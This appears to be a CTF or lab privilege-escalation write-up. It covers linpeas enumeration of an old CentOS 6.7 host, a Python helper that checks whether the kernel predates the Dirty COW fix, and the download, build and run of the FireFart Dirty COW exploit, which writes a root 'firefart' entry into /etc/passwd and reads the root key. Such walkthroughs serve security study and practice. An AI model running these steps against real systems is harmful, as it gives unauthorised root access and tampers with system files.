linpeas
sh
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/gcc
/usr/bin/gdb
/usr/bin/make
/usr/bin/perl
/usr/bin/php
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.6
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
gcc.i686 4.4.7-17.el6 @base
/usr/bin/gcc

sh
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 2.6.32-573.el6.i686 (mockbuild@c6b9.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Thu Jul 23 12:37:35 UTC 2015
LSB Version: :base-4.0-ia32:base-4.0-noarch:core-4.0-ia32:core-4.0-noarch:graphics-4.0-ia32:graphics-4.0-noarch:printing-4.0-ia32:printing-4.0-noarch
Distributor ID: CentOS
Description: CentOS release 6.7 (Final)
Release: 6.7
Codename: Final
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.6p3
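Before firing a kernel exploit it is worth checking the running kernel against the errata kernel that fixed the bug, using RPM's version ordering rather than a plain string compare (otherwise 2.6.32-573 and 2.6.32-642.6.2 compare wrongly). The Python below is an added example, not from the writeup: it implements rpmvercmp-style segment comparison and applies it to the uname -r that linpeas reported. The fixed version it assumes for CVE-2016-5195 on CentOS 6, kernel-2.6.32-642.6.2.el6, is an assumption to verify against the distribution's advisory before relying on the verdict.

```python
"""Decide whether a running el6 kernel predates a given errata kernel before running a kernel exploit.

Added example, not part of the original writeup. Implements RPM's version/release ordering
(rpmvercmp-style segment comparison) so that 2.6.32-573.el6 sorts below 2.6.32-642.6.2.el6.
The fixed kernel used in the demo (kernel-2.6.32-642.6.2.el6 for CVE-2016-5195) is an
assumption; verify it against the CentOS/RHEL advisory.
"""
import re
from typing import List, Tuple

_SEG = re.compile(r"(\d+|[A-Za-z]+)")


def _segments(s: str) -> List[str]:
    """Split '642.6.2.el6' into ['642', '6', '2', 'el', '6']; separators are ignored."""
    return _SEG.findall(s)


def rpm_segment_cmp(a: str, b: str) -> int:
    """Compare two version-or-release strings the way rpmvercmp does: numeric segments
    compare numerically, alphabetic segments lexically, and a numeric segment beats an
    alphabetic one. Returns -1, 0 or 1."""
    sa, sb = _segments(a), _segments(b)
    for x, y in zip(sa, sb):
        xn, yn = x.isdigit(), y.isdigit()
        if xn and yn:
            if int(x) != int(y):
                return (int(x) > int(y)) - (int(x) < int(y))
        elif xn != yn:
            return 1 if xn else -1
        elif x != y:
            return (x > y) - (x < y)
    return (len(sa) > len(sb)) - (len(sa) < len(sb))


def split_kernel_release(uname_r: str) -> Tuple[str, str]:
    """'2.6.32-573.el6.i686' -> ('2.6.32', '573.el6'); the trailing arch suffix is dropped."""
    version, _, release = uname_r.partition("-")
    for arch in (".i686", ".x86_64", ".i386"):
        if release.endswith(arch):
            release = release[: -len(arch)]
    return version, release


def kernel_cmp(running: str, fixed: str) -> int:
    """Negative if `running` is older than `fixed`: version is compared first, then release."""
    rv, rr = split_kernel_release(running)
    fv, fr = split_kernel_release(fixed)
    return rpm_segment_cmp(rv, fv) or rpm_segment_cmp(rr, fr)


def predates_fix(running: str, fixed: str) -> bool:
    """True when the running kernel is strictly older than the errata kernel."""
    return kernel_cmp(running, fixed) < 0


if __name__ == "__main__":
    # Constructed inputs: the uname -r from the target, and the assumed fixed kernel.
    running = "2.6.32-573.el6.i686"
    fixed = "2.6.32-642.6.2.el6"
    print(running, "predates", fixed, "->", predates_fix(running, fixed))
```

A True result only says the kernel is older than the fix; whether the exploit is safe to run on a given box (Dirty COW races have been known to leave kernels unstable) is a separate judgement.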
sh
docker run --rm -v "$PWD":/usr/src/myapp -w /usr/src/myapp gcc:4.8 gcc -O2 25444.c -o 25444
A first candidate, 25444.c, was built on the attack box in a gcc:4.8 container; it is not used below. The target runs kernel 2.6.32-573.el6 on CentOS 6.7, which predates the Dirty COW fix (CVE-2016-5195, shipped in kernel-2.6.32-642.6.2.el6), and has gcc 4.4.7 installed, so 40839.c (FireFart's /etc/passwd-overwrite variant of the exploit) was compiled in place with the flags from the exploit's own header.

sh
bash-4.1$ wget http://172.16.1.1/40839.c

sh
bash-4.1$ gcc -pthread 40839.c -o 40839 -lcrypt

sh
bash-4.1$ ./40839
./40839
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: rooted
Complete line:
firefart:fik43qBvLQn4.:0:0:pwned:/root:/bin/bash
mmap: b776a000
The exploit wrote a UID 0 entry (firefart:fik43qBvLQn4.:0:0:pwned:/root:/bin/bash, with a crypt(3) hash of the password typed above) straight into /etc/passwd; restore the file from /tmp/passwd.bak once finished.

sh
bash-4.1$ su firefart
su firefart
Password: rooted
[firefart@teamspeak tmp]# whoami
whoami
firefart
[firefart@teamspeak tmp]# cat /root/key.txt
cat /root/key.txt
5iuz6e8ktzuyhhtitvhn
[firefart@teamspeak tmp]# date
date
Sat Feb 15 13:38:10 EST 2025